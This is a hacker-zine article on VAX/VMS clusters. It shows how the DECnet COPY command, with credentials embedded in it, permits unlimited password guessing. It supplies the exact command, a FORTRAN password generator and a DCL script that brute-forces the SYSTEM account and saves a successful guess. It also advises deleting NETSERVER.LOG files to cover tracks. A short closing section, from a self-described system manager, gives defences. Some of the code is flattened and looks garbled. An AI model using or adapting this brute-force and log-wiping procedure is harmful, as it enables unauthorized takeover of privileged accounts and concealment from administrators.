More VAX Tricks

by Mainstream America

So you're getting tired of the VAX hanging up on you after three tries at the system password.  And your Demon Dialer is about to sue you for overwork.  Well, cheer up, fellow hackers.  There is hope.  Assuming your target system is set up as a clustered environment, there is an interesting weakness that will allow non-privileged users unlimited guesses at any account.

A number of VAX/VMS commands are designed to accept a password, username, and a node name along with the file specification.  These commands include COPY, APPEND, and DELETE.

For the sake of consistency, let's use the COPY command.

In order to copy the file LOGIN.COM from a target directory into your non-privileged account renaming it GOT.IT, use the following syntax:

$ COPY OSHKOSH"SMITH PASSWORD"::DRC5:[SMITH]LOGIN.COM[]GOT.IT

This will copy SMITH's LOGIN.COM from his directory on node named OSHKOSH to your directory.  (On the same node and device.  Just repeat the same syntax for your directory if your account resides elsewhere.)

Naturally this assumes that SMITH has a LOGIN.COM in his directory in the first place, a likely assumption although this certainly is grounds to either use a different command or restructure it to copy one of your files into his directory.

Now all you have to do is keep guessing at the password.  Unfortunately there is one small catch (there always is).  This will leave a trace.  It's called: NETSERVER.LOG

This file is deposited in the target directory every time you enter this command and, yes, it has your name in it.

But there's usually more than one way to skin a VAX.  Many (not all) VAX clusters are set up to purge these NETSERVER.LOG files.  This means that at least there will be fewer traces.  Furthermore, if you're quick enough in guessing the password before suspicions are aroused, just login to his account and delete the ruddy logfiles.

Now if the target account is not privileged (specifically, doesn't have EXQUOTA) and these files aren't purged, you'll eventually overflow his allotted disk space and won't be able to guess any more passwords until someone of authority straightens out the account.

On the other hand, if the account has privileges (which is why you're trying to guess the password in the first place), you need not worry about this.

Most people use easily-remembered passwords that you quite likely can guess just by knowing a bit more about them.  On the other hand, they might use a conglomeration of two or more words or numbers.  If this is the case, you'll probably want to feed the above command with a password generator.

Below is such a generator.  It was quickly put together and I'm sure you hackers out there can write up a better one.  It's here purely to demonstrate a technique:

GUESS.F:

!FORTRAN PASSWORD GENERATOR IMPLICIT INTEGER (A-Z) INTEGER D(17) DOUBLE PRECISION COUNTER CHARACTER*1 A(38), C(16), B, E(23) DATA A/'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','$','_','0','1','2','3','4','5','6','7','8','9'/ DATA B/' '/ DATA E/'@','G','U','E','S','S',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ',' '/ DO 1 L=1,16 D(L)=0 !initialize each counter C(L)=8 !and blank out the outputted number array D(17)=0 DIGITS=1 TIME=1 COUNTER=0 50 COUNTER=COUNTER+1 IF (COUNTER.EQ.38**TIME)THEN DIGITS=DIGITS+1 TIME=TIME+1 COUNTER=0 END IF D(1)=D(1)+1 DO 20 I=1,DIGITS IF(D(I).GT.38)THEN D(I)=1 D(I+1)=D(I+1)+1 END IF 20 CONTINUE DO 30 J=1,DIGITS C(J)=A(D(J)) 30 CONTINUE DO 60 NN=1,DIGITS 60 E(8+NN)=C(NN) 300 FORMAT(30A1) STATUS=LIB$SPAWN(E..SYS$OUTPUT) GOTO 50 200 FORMAT(X,16A1) END

Now here's where things get a bit sticky.  Trying to execute the command from within this FORTRAN program will bomb its execution upon the first privilege violation.  The way to do it then is to feed the password as a parameter to a DCL procedure that continues on error.  Thus the second program:

! PASSWORD GUESSER - GUESS.COM $ ON ERROR THEN CONTINUE $ ON CONTROL_Y THEN EXIT $ COPY OSHKOSH"SYSTEM ''P1'"::DRC3:[OSHKOSH]LOGIN.COM[]GOT.IT $ IF $STATUS THEN GOTO CAUGHT $ EXIT $ CAUGHT: $ OPEN/WRITE IN_FILE PASS.WORD $ WRITE IN_FILE "The password for SYSTEM is ",P1 $ CLOSE IN_FILE $ DELETE PROBE.EXE;* ! This will stop execution upon success

Now, pardon me while I remove my tongue planted so firmly in my cheek.  As you may have guessed, I'm a system person.  So what's a system manager to do about such a weakness?

First off, simply having two passwords on all privileged accounts will make the above technique excruciatingly difficult.  In this way, your hacker will need two password generators running simultaneously (or more practically, in the same program) and both passwords will have to be guessed simultaneously.

If this is inconvenient, impractical, or still too insecure for you, you'll want to set the audit alarm on for network logins.  Then, on a periodic basis (e.g. nightly), run a batch job that closes the operator log and searches it for such failures.  From here, you have your choice of evasion techniques including parsing out the username and disusing his account.

Clusters allow a great deal more resources for the money.  Unfortunately, as your access rate climbs so does your intrusion attempt rate.  It's interesting that communication security has lagged system security disproportionately.

Personally, I think it's a plot by the 2600s.  Keep it up, fellows!

Code: GUESS.F